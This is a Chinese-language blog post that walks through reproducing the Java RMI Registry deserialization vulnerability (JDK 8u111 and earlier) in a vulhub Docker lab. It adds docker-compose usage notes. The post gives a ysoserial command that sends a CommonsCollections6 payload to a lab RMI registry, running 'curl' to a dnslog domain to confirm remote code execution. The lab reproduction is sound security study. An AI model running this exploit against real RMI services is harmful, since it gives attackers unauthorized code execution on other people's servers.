Java RMI Registry 反序列化漏洞(=jdk8u111)

最新推荐文章于 2024-05-12 21:52:27 发布
最新推荐文章于 2024-05-12 21:52:27 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 中间件漏洞复现 文章标签: java 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414578
版权

声明

好好学习,天天向上

漏洞描述

Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).

影响范围

<=jdk8u111

复现过程

使用vulhub

/app/vulhub-master/java/rmi-registry-bind-deserialization

使用docker启动

docker-compose build
docker-compose up -d

dnslog生成一个DNS

http://www.dnslog.cn/

kali执行命令,使用yso,自行修改IP和DNS地址

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.239.129 1099 CommonsCollections6 "curl ds7x6t.dnslog.cn"

在这里插入图片描述

DNSLOG刷新

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
javaRMI反序列化漏洞验证工具
08-21
**Java RMI反序列化漏洞概述** Java RMI反序列化漏洞主要源于不正确的类型检查和信任机制。当接收到未经验证的远程调用时,如果服务器没有正确地校验或限制输入数据,攻击者可以通过构造恶意序列化数据来操控远程...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java RMI Registry 反序列化漏洞(<=jdk8u111)
zzzzz1284的博客
03-13 330
Java RMI Registry 反序列化
Java-RMI漏洞利用
2301_76175665的博客
06-16 1534
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
Java RMI SERVER命令执行漏洞
最新发布
m0_62670778的博客
05-12 390
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。
漏洞名称:RMI 未授权访问漏洞
qq_36902628的博客
03-21 1692
漏洞名称:RMI 未授权访问漏洞
漏洞名称-RMI 未授权访问漏洞
qq_44005305的博客
03-10 1030
漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache CommonsCollections的漏洞版本,就可以在该服务器上执行相关命令。漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API接口,可直接被非法增删改次数据。且因为攻击是在未认证下进行的,所以后续无法通过定位用户进行异常排查。
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
rmi-registry-bind-deserialization
weixin_37639863的博客
02-18 466
Java RMI Registry 反序列化漏洞(=jdk8u111)_黑白的博客-CSDN博客_java rmi漏洞复现声明好好学习,天天向上漏洞描述Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是common
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出网
siu~
12-18 1244
知识点: 1、Java安全-RCE执行-5大类函数调用 2、Java安全-JNDI注入-RMI&LDAP&高版本 3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
resttemplate 序列化_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
weixin_39594439的博客
10-21 184
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-2628)漏洞复现》作者介绍:ChowChow,一个行走的“十万个为什么”,喜欢学自己兴趣所向的知识,虽然现在还是个弱鸡,但是学就完事啦!一、基本信息一.基本概要发布时间:2017年11月22日漏...
端口渗透篇:Java RMI 远程代码执行漏洞
weixin_50464560的博客
11-26 1675
持续更新:整理下渗透测试工作中发现过的漏洞(包含漏洞描述、漏洞等级、漏洞验证、修复建议),这里不深究漏洞产生的各种后利用或者绕过方式,漏洞验证过程不局限于文章中的方法,能够证明漏洞存在即可。
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 843
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
oracle java rmi 漏洞,learnjavabug: Java安全相关的漏洞和技术demo,其中包括原生Java、Fastjson、Jackson、Hessian2以及XML反序列化漏洞利...
weixin_42515056的博客
04-05 150
fastjsoncom.threedr3am.bug.fastjson.FastjsonSerialize(TemplatesImpl) 利用条件:fastjson <= 1.2.24 + Feature.SupportNonPublicFieldcom.threedr3am.bug.fastjson.NoNeedAutoTypePoc 利用条件:fastjson < 1.2.48 不...
java rmi registry 反序列化漏洞(<jdk8u232_b09) 复现
12-14
Java RMI Registry反序列化漏洞是指在JDK 8u232_b09(以及之前的版本)中存在一个漏洞,导致攻击者可以利用该漏洞在目标系统上执行任意代码。 要复现这个漏洞,可以按照以下步骤进行: 1. 准备环境:首先,需要确保目标系统上安装了受影响版本的JDK,即JDK 8u232_b09或更早的版本。 2. 下载Payload:根据漏洞的特性,我们需要准备一个Payload来利用这个漏洞。可以通过搜索相关的公开Payload库或自行编写Payload。 3. 启动RMI Registry:然后,使用命令行启动RMI Registry服务,可以使用如下命令:`rmiregistry`。RMI Registry将监听默认端口1099。 4. 编写Exploit代码:使用Java编写一个包含恶意代码的Exploit程序,该程序将利用JDK 8u232_b09中的反序列化漏洞执行Payload。 5. 注册Exploit:使用RMI Registry注册Exploit程序。可以使用以下代码将Exploit程序注册到RMI Registry中:`Naming.rebind("Exploit", exploitObj)`,其中`Exploit`是注册的名称,`exploitObj`是包含Exploit代码的对象。 6. 触发漏洞:在目标系统上执行注册了Exploit的RMI Registry服务。 7. 检查结果:如果一切正常,攻击者将成功利用反序列化漏洞执行恶意代码,可以在目标系统上执行任意操作。 需要注意的是,这个漏洞已经被修复,因此不建议将其用于非法用途。此外,对于生产环境来说,确保及时更新和升级JDK版本是最重要的安全措施之一,以防止潜在的漏洞利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值